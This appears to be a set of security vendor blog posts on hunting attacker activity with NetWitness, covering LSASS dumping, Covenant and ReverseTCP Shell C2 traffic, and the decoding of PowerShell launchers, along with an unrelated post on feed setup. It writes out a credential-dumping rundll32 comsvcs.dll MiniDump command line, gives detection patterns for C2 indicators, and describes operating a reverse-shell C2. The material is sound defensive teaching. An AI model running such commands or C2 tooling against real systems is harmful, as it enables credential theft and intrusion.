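    return "rundll32" in c and "comsvcs.dll" in c and "minidump" in c

# Hypothetical command line matching the pattern seen in this post
# (the PID 624 is invented for illustration).
cmd = (r"C:\Windows\System32\rundll32.exe "
       r"C:\windows\System32\comsvcs.dll, MiniDump 624 "
       r"\Windows\Temp\tmp.dmp full")
print(flags_minidump_via_comsvcs(cmd))  # True
```

A simple substring match like this will catch the default invocation, but, as with the app rule, a determined attacker can rename or obfuscate their way around it.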

 

Conclusion

It is important to consistently monitor network and endpoint behaviour for abnormal actions taking place, and not solely rely on out of the box detections. New attack methods/tools are consistently being developed, but the actions these tools take always leave footprints behind; it is down to the defender(s) to spot the anomalies and triage accordingly. With that being said, RSA are consistently updating detections for attacks such as the one laid out in this post - we have been working with the content team to have this tool usage detected with out of the box content.

Introduction

Having recently moved into the IR team – where I now have to actually do stuff as opposed to just talking about stuff in technical sales – I have found that the best way to get up to speed with detecting attacker behaviours is to run the tools they are likely to use in my lab so I can get familiar with how they work. Reading blogs like this and the others in Lee Kirkpatrick's excellent Profiling Attackers Series is great, but I find I learn much faster by doing things and interacting with systems myself.


Covenant

Covenant is an open source C2 framework (https://github.com/cobbr/Covenant) that can be viewed as a replacement for PowerShell Empire since that project's retirement.

In this blog series, Lee Kirkpatrick has already covered some examples of how to get the payload delivered and installed on the target, so we’re going to dive straight in to how our Hunting Methodology can be used to detect the activity. We are going to hunt for activity using data generated by both NetWitness Network and NetWitness Endpoint.

For the purpose of this exercise, we have used the default HTTP settings for the Listener profile in Covenant, and only changed the default beacon setting from 5 seconds to 120 seconds to represent a more realistic use of the tool. The settings can be easily changed (such as the user-agent, and the directory and files used for the callback), but quite often the defaults are used by attackers too! We have also used the PowerShell method for creating our Launcher.


NetWitness Network Analysis

Covenant uses an HTTP connection for its communication (which can optionally be configured to run over SSL with user provided certs). By using our regular methodology of starting with Outbound HTTP traffic (direction = ‘outbound’ && service = 80), we can review the Analysis meta keys for any interesting indicators:

 

 

Reviewing the Service Analysis keys (analysis.service) we can see some interesting values:

 

 

Check the RSA NetWitness Hunting Guide for more information on these values in Service Analysis.

 

By drilling into these 6 values we reduce our dataset from over 4,000 sessions to 69 sessions – this means that these 69 sessions all share the same "interesting" characteristics that suggest they are not normal user-initiated web browsing.

 

 

With 69 sessions we can use Event Analysis to view those sessions in more detail, which reveals the bulk of traffic belongs to the same Source & Destination IP address pair:

 

 

This appears to be our Covenant C2 communications. Opening the session reconstruction, we can see more details. One thing we can observe that could be used to enhance detection of this traffic is the strange-looking User-Agent string:

 

 

The User-Agent string is strange because it appears to be old. It resolves to Chrome version 41 on Windows 7 – the victim in this case is a Windows 10 system, and the version of Chrome installed on the host is version 79. If you attempt to connect to the Listener with a different User-Agent it returns a 500 error:

 

 

Don't poke the Bear (or Panda, Kitten, Tiger etc) - if you find these indicators in your environment, don't try to establish a connection back to the attacker's system as you will give them a tip-off that you are investigating them.

Also, the HTTP Request Header “cookies” appears in all sessions:

 

 

The HTTP Request Header “cookie” also appears in all sessions after the initial callback … so sessions with both “cookies” and “cookie” request headers appear unique to this traffic:

 

 

The following query (which could be used as an App rule) identifies the Covenant traffic in our dataset:

client = 'mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/41.0.2228.0 safari/537.36' && http.request = 'cookies' && http.request = 'cookie'
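The same three indicators can also be checked programmatically when working with exported proxy or HTTP logs. This Python sketch is illustrative only; the headers dict is a hypothetical request modelled on the traffic described above (the cookie values are invented):

```python
COVENANT_DEFAULT_UA = ("mozilla/5.0 (windows nt 6.1) applewebkit/537.36 "
                       "(khtml, like gecko) chrome/41.0.2228.0 safari/537.36")

def matches_covenant_default(headers: dict) -> bool:
    """Return True when a request carries the default Covenant profile
    indicators: the stale Chrome 41 User-Agent plus BOTH a 'Cookies'
    and a 'Cookie' request header."""
    names = {k.lower() for k in headers}
    ua = headers.get("User-Agent", "").lower()
    return ua == COVENANT_DEFAULT_UA and {"cookies", "cookie"} <= names

req = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
    "Cookies": "SESSIONID=1552332971750",   # static default, per below
    "Cookie": "session=abc",                # invented example value
}
print(matches_covenant_default(req))  # True
```

As with the app rule, this only catches the default profile - an operator who customises the Listener settings will need different indicators.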

Another indicator we could use is the Request Header value SESSIONID=1552332971750, as this also appears to be a static string in the default HTTP profile for Covenant - as shown in this sample that has been submitted to hybrid-analysis.com https://www.hybrid-analysis.com/sample/aed68c3667e803b1c7af7e8e10cb2ebb9098f6d150cfa584e2c8736aaf863eec?environmentId=10… 

 

 

NetWitness Endpoint Analysis

When hunting with NetWitness Endpoint, I always start with my *Compromise keys – Behaviours of Compromise, Indicators of Compromise, and Enablers of Compromise, as well as reviewing the Category of endpoint events.

 

 

Here we can see 4 meta values related to running PowerShell – which we know is the method used for creating our Covenant Launcher.

Upon viewing these events in Event Analysis, we can see the encoded PowerShell script being launched:

 

 

Analysis shows that we have a very large encoded parameter being passed. It’s too large for us to decode and manage in the NetWitness GUI, so we can paste the command into CyberChef and decode it from there.

 

 

We can further decode the string to reveal the command:

 

 

The output here appears to be compressed, so we can add an Inflate operation to our recipe to reveal the contents:
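The same decoding steps can be scripted: -EncodedCommand is Base64-wrapped UTF-16LE, and the inner blob inflates as raw DEFLATE. The payload below is a synthetic stand-in built in the script itself (the $data wrapper and URL are invented for illustration; real Covenant launchers differ), so the round trip can be demonstrated safely:

```python
import base64
import zlib

def build_sample(cmd: str) -> str:
    """Build a synthetic stand-in for an encoded launcher: the inner
    command is raw-DEFLATE-compressed, Base64-encoded, wrapped in a
    UTF-16LE script, then Base64-encoded again for -EncodedCommand."""
    deflated = zlib.compress(cmd.encode())[2:-4]  # strip zlib header/checksum
    inner = base64.b64encode(deflated).decode()
    script = f"$data='{inner}';IEX $data"         # invented wrapper
    return base64.b64encode(script.encode("utf-16-le")).decode()

def decode_encoded_command(enc: str) -> str:
    """Step 1: -EncodedCommand is Base64 of a UTF-16LE string."""
    return base64.b64decode(enc).decode("utf-16-le")

def inflate_inner(b64: str) -> str:
    """Step 2: Base64-decode the inner blob, inflate as raw DEFLATE."""
    return zlib.decompress(base64.b64decode(b64), -15).decode()

enc = build_sample("Invoke-WebRequest http://example.test/grunt")
script = decode_encoded_command(enc)
inner = script.split("'")[1]
print(inflate_inner(inner))  # Invoke-WebRequest http://example.test/grunt
```

CyberChef's "From Base64", "Decode text (UTF-16LE)", and "Raw Inflate" operations perform exactly these steps on real samples.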

 

 

Looks like we have some executable code. A quick search for recognisable strings yields a URL that matches our network traffic for the callback to the Covenant server, as well as a template for the HTML page that should match what is served by the Covenant Listener.

 

 

Also, the block of text can be Base64 decoded to reveal the Request Headers to be sent by the Grunt when communicating with the Listener:

 

 

This also matches what we observed in our network analysis for a Grunt check-in:

 

 

And the command being sent to the Grunt via the response from the Listener:

 

Decoding the &data= section of the above Post shows the encrypted data being returned to the Listener - known as the GruntEncryptedMessage:

 

 

 

Happy Hunting!

CT


Easy-add Recurring Feeds

Posted by Josh Randall, Dec 19, 2019

19DEC2019 Update (with props to Leonard Chvilicek for pointing out several issues with the original script)

  • implemented more accurate java version & path detection for JDK variable
  • implemented 30 second timeout on s_client command
  • implemented additional check on address of hosting server
  • implemented more accurate keystore import error check
  • script will show additional URLs for certs with Subject Alternate Names

 

In the past, I've seen a number of people ask how to enable a recurring feed from a hosting server that is using SSL/TLS, particularly when attempting to add a recurring feed hosted on the NetWitness Node0 server itself.  The issue presents itself as a "Failed to access file" error message, which can be especially frustrating when you know your CSV file is there on the server, and you've double- and triple-checked that you have the correct URL:

 

There are a number of blogs and KBs that cover this topic in varying degrees of detail:

 

 

Since all the steps required to enable a recurring feed from a SSL/TLS-protected server are done via CLI (apart from the Feed Wizard in the UI), I figured it would be a good idea to put together a script that would just do everything - minus a couple requests for user input and (y/N) prompts - automatically.

 

The goal here is that this will quickly and easily allow people to add new recurring feeds from any server that is hosting a CSV:

 

Success!

In this blog post, I am going to cover a C&C framework called ReverseTCP Shell, which was recently posted to GitHub by ZHacker:

 

With this framework, a single PowerShell script is used, and PowerShell is the server component of the C2. This is also a little different from other C2s as it doesn't use a common protocol such as HTTP. This is why we thought it would be a good idea to cover, as it allows us to demonstrate the power of NetWitness with proprietary or unknown protocols.

 

The Attack

Upon execution of the ReverseTCP Shell PowerShell script, it will prompt for a couple of parameters, such as the host and port to listen for connections:

 

It then supplies options to generate a payload; I chose the Base64 option and opted to deploy the CMD Payload on my endpoint. At this point, the C2 also starts to listen for new connections:

 

After executing the payload on my endpoint, I receive a successful connection back:

 

Now that I have my successful connection, I can begin to execute reconnaissance commands on the endpoint, or any commands of my choosing:

 

The C2 also allows me to take screenshots of the infected endpoint, so let's do that as well:

 

NetWitness Packets Analysis

NetWitness Packets does a fantastic job at detecting protocols and has a large range of parsers to do so. In some cases, NetWitness Packets cannot classify the traffic it is analysing; this could be because it is a proprietary protocol, or just a protocol there is no parser for yet. In these instances, the data gets classified as OTHER.

 

This traffic will still be analysed by the parsers in NetWitness, and should therefore be analysed by you as well. So to start the investigation, we would focus on traffic of type OTHER using the following query: service=0. From here, we can open other meta keys to see what information NetWitness parsed out. One that instantly stands out as a great place to start investigating is the windows cli admin commands metadata under the Service Analysis meta key:

 

Reconstructing the sessions, it is possible to see raw data being transferred back and forth. There is no structure to the data, which is why NetWitness classified it as OTHER, but because NetWitness saw CLI commands being executed, it still created a piece of metadata to tell us about it:

NOTE: You may notice that the request and response in the above screenshot are reversed, this can happen for a number of reasons and an explanation as to why this occurs can be found in this KB article: 000012891 - When investigating sessions in RSA NetWitness, the source and destination IP addresses appear reversed.

 

The following query could be used to find suspect traffic such as this:

service = 0 && analysis.service = 'windows cli admin commands'

 

Further perusing the traffic for this C2, we can also see the screenshot taking place:

 

Which returns a decimal encoded PNG image:

 

We can take these decimal values from the network traffic and run them through a recipe in CyberChef (https://gchq.github.io/CyberChef) to render the image, and see what the attacker saw:
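The decimal-to-image step can also be scripted, mirroring CyberChef's "From Decimal" (plus "Render Image") recipe. The sample below uses only the first eight bytes of any PNG file - its fixed signature - so the conversion can be verified without real capture data:

```python
def decimal_stream_to_bytes(text: str) -> bytes:
    """Convert space-separated decimal byte values (as seen in the C2
    traffic) back into raw bytes."""
    return bytes(int(v) for v in text.split())

# The first eight bytes of every PNG file are its fixed signature.
sample = "137 80 78 71 13 10 26 10"
data = decimal_stream_to_bytes(sample)
print(data[:8] == b"\x89PNG\r\n\x1a\n")  # True

# In practice you would convert the full stream and write it out:
# open("screenshot.png", "wb").write(data)
```

A leading PNG (or JPEG) signature in an otherwise unstructured decimal stream is a quick confirmation that an image, such as a screenshot, is being exfiltrated.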

 

NetWitness Endpoint Analysis

In NetWitness Endpoint, I always like to start my investigation by opening the IOC, BOC, and EOC meta keys. All of the metadata below should be fully investigated, but for this blog post, I will start with runs powershell decoding base64 string:

Pivoting into the Events view and analysing all of the sessions, I come across the command I used to infect the endpoint. This event should stand out as odd due to the random capitalisation of the characters, which is an attempt to evade case-sensitive detection mechanisms, as well as the randomised Base64 encoded string, which is there to hide the logic of the command:

 

Due to the obfuscation put in place by the creator, we cannot directly decode the Base64 in the UI; this is because the Base64 encoded string has been shuffled. For instances like this, where large amounts of obfuscation are put in place, I like to let PowerShell decode it for me by replacing IEX (Invoke-Expression) with Write-Host - so rather than executing the decoded command, it outputs it to the terminal:

Always perform any malware analysis in a safe, locked down environment. The method of deobfuscation used above does not necessarily mean you will not be infected when performing the same on other scripts.

After decoding the initial command, it appears there is more obfuscation in place, so I do the same as before, replacing IEX with Write-Host to get the decoded command. This final deobfuscation reveals a PowerShell command to open a socket to a specified address and port - I now have my C2, and can use this information to pivot to the data in NetWitness Packets (if I had not found it before):

 

The above PowerShell was a subset of the first decoded command. The final piece of the PowerShell is a while loop that waits for data from the socket it opens, which is why the IEX alteration would not work here; the rest is just obfuscation, using multiple poorly named variables to make it hard to understand:

 

Flipping back over to the Investigation UI and looking at other metadata under the BOC meta key, it is possible to see a range of values being created for the reconnaissance commands that were executed over the C2:

 

As of 11.3, there is a new Analyze Process view (Endpoint: Investigating a Process), it allows us to visually understand the entire process event chain. Drilling into one of the events, and then using the Analyze Process function, it is possible to see all of the additional processes spawned by the malicious PowerShell process:

 

Conclusion

Analysing all traffic and protocols is important. It is true that some protocols will be (ab)used more than others, but excluding the analysis of traffic classified as OTHER can allow malicious communications such as the one detailed in this blog post to go under the radar. Looking for items such as files transferred, CLI commands, long connections, etc. can all help whittle down the data set in the OTHER bucket to potentially more interesting traffic.
